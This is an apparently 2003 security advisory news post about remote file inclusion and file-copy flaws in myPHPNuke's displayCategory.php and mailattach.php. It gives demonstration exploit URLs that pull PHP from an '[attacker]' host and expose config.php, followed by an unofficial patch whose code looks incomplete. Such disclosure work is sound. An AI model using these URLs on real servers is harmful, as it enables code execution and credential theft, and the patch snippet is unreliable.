Main Menu
Network
Sponsor
Top 10 Sites
Partners
|
|
Top Submit newsSubscribe 
Communication | Computer Crime | Digital Audio, Video, Photo | General News | Hardware | Internet | Mobile | PDA | Security | Software | Vulnerability |
Previous articleBack to news listNext article
| Sponsored links | Want to become one of our authors and see your work published on ALLSeek.iNFO ?
| | myPHPNuke 'displayCategory.php' Include File Flaw Lets Remote Users Execute Arbitrary Code |
|---|
Categorie: Vulnerability
Posted: 2003-09-15 by ReCall
Views: 429
Source: Click here
| Current Rating: Not rated
|
| | Details |
|---|
Description: Several vulnerabilities were reported in myPHPNuke. A remote user can execute arbitrary PHP code, including operating system commands, on the target system.
Frog-m@n reported that there is an include file vulnerability in 'gallery/displayCategory.php'. The script reportedly includes two PHP scripts without ensuring that the proper files are included. A remote user can specify an alternate location for the include files to cause the system to include and execute arbitrary PHP code, including operating system commands. The code will execute with the privileges of the target web server.
The vulnerable include statements are:
include ("$basepath/imageFunctions.php");
include ("$adminpath/fileFunctions.php");
Some demonstration exploit URLs that will include and execute the 'imageFunctions.php' and 'fileFunctions.php' scripts (respectively) on the 'attacker' computer are provided:
http://[target]/gallery/displayCategory.php?basepath=http://[attacker]
http://[target]/gallery/displayCategory.php?adminpath=http://[attacker]
It is also reported that the OpenTable() function in the 'mailattach.php' script attaches a file without validating the user-specified file names. A remote user can, for example, copy some files on the system to a location where the file can be viewed via the web server. A demonstration exploit URL is provided:
http://[target]/mailattach.php?s ubmit=1&attach1=admin/original/config.php&attach1_name=../DBInfos.txt
This demonstration exploit URL reportedly will cause the system to copy the file admin/original/config.php so that the file can be accessed with the following URL:
http://[target]/DBInfos.txt
This flaw can also be exploited to copy arbitrary PHP code to locations on the web server. A demonstration exploit URL is provided:
http://[target]/mailattach.php?submit=1 &attach1=http://[attacker]/bad.txt&attach1_name=../bad.php
Impact: A remote user can view some files on the system with the privileges of the web server.
A remote user can include and execute arbitrary PHP code (including operating system commands) on the system. The code will run with the privileges of the web server.
Solution: No solution was available at the time of this entry.
Unofficial patch:
A patch can be found on http://www.phpsecure.info.
In gallery/displayCategory.php, add before all lines the lines :
-------------------------------------------------------------------
if (isset($_REQUEST["basepath"]) OR isset($_REQUEST["adminpath"])){
die("Patched.");
-------------------------------------------------------------------
And in mailattach.php, add just after the lines :
-------------------------
[...]
OpenTable();
global $attachmentdir;
[...]
-------------------------
the lines :
-----------------------------------------------------------------------------------------------------
------------------------------------------------------
if (isset($_REQUEST["attach1_type"]) OR isset($_REQUEST["attach1_name"])
OR ereg("/",$attach1) OR ereg("..",$attach1) OR ereg(".php",$attach1_
name)
){
die("Patched.");
}
-----------------------------------------------------------------------------------------------------
------------------------------------------------------
| | Syndication |
|---|
Permalink Email this
The URI to TrackBack this entry is:
http://allseek.info/news/trackback.php?id=426
| | User comments (post your comments ) |
|---|
Only registerd members can post comments and articles
|
| Previous articleBack to news listNext article
|
|
|
|
InterJOB.su
|
